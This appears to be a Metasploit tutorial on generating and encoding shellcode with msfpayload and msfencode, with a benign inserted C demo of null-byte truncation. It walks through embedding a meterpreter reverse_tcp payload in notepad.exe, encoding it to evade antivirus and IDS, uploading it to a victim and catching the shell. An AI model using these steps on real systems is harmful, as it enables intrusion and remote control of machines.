MsfPayload

A payload is code that we want the system to execute and that is selected and delivered by the Framework. The msfpayload component of Metasploit allows you to generate shellcode. Msfpayload is located in the directory /opt/framework/msf3/. To see the list of payloads, type ./msfpayload -l
MsfEncode

The shellcode generated by msfpayload is fully functional, but it contains several null characters that many programs interpret as the end of a string, which causes the code to terminate before completion.
In other words, those \x00s and \xffs can break your payload!
In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters. Enter msfencode -h to see a list of msfencode options. msfencode is located in the same directory as msfpayload.
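The null-byte truncation described above, shown as an added example that is not code from the original post. The sample bytes are constructed placeholders (not shellcode) and the function names are hypothetical; the point is that a string copy stops at the first 0x00 while a length-delimited copy does not.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_LEN 64

/* Constructed sample data: eight bytes with a 0x00 at index 3. */
static const unsigned char sample[8] =
    {0x41, 0x42, 0x43, 0x00, 0x44, 0x45, 0x46, 0x47};
/* Constructed sample data with no null byte anywhere. */
static const unsigned char sample_no_null[8] =
    {0x41, 0x42, 0x43, 0x01, 0x44, 0x45, 0x46, 0x47};

/* Index of the first 0x00 in the buffer, or -1 if there is none. */
long first_null(const unsigned char *src, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (src[i] == 0x00) return (long)i;
    return -1;
}

/* How many bytes arrive when the data passes through a C string copy. */
size_t survives_string_copy(const unsigned char *src, size_t len) {
    char in[MAX_LEN + 1], out[MAX_LEN + 1];
    if (len > MAX_LEN) len = MAX_LEN;
    memcpy(in, src, len);
    in[len] = '\0';          /* guarantee termination so strcpy cannot overread */
    strcpy(out, in);         /* stops at the first 0x00 it meets */
    return strlen(out);
}

/* How many bytes arrive when the copy is driven by an explicit length. */
size_t survives_length_copy(const unsigned char *src, size_t len) {
    unsigned char out[MAX_LEN];
    if (len > MAX_LEN) len = MAX_LEN;
    memcpy(out, src, len);   /* copies every byte, 0x00 included */
    return memcmp(out, src, len) == 0 ? len : 0;
}

int main(void) {
    printf("first null at index: %ld\n", first_null(sample, sizeof sample));
    printf("string copy kept:    %zu of %zu bytes\n",
           survives_string_copy(sample, sizeof sample), sizeof sample);
    printf("length copy kept:    %zu of %zu bytes\n",
           survives_length_copy(sample, sizeof sample), sizeof sample);
    printf("string copy, no null: %zu bytes\n",
           survives_string_copy(sample_no_null, sizeof sample_no_null));
    return 0;
}
```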
For the example, I try to craft an exe file. This time, I crafted a notepad file.
As you can see from the picture above, for msfpayload I use windows/meterpreter/reverse_tcp as the payload, and LHOST is 192.168.56.1 (my IP address). For msfencode, I use the prefix -t to build the exe file and -e to use an encoder from Metasploit; I use the x86/shikata_ga_nai encoder. -x defines the location of notepad.exe, -k keeps the payload running, -o defines the output filename, and the prefix -c defines the number of times to encode the data. If you want to see the list of prefixes, it is shown the first time you run msfencode.
If we succeed in crafting it, information like this will appear.
If we want proof that the file has been created, just type the command ls.
Next step: upload that file to the victim from the meterpreter in msf. Just type the command upload /opt/framework/msf3/tes.exe C:\ . It means we want to upload the file tes.exe, located in the directory /opt/framework/msf3, to the directory C:\ on the victim's computer.
Well then, I use the exploit multi handler to exploit the victim.
Then run the exploit. If the tes.exe file that we have uploaded is run by the victim, then we will succeed in gaining entry.
Success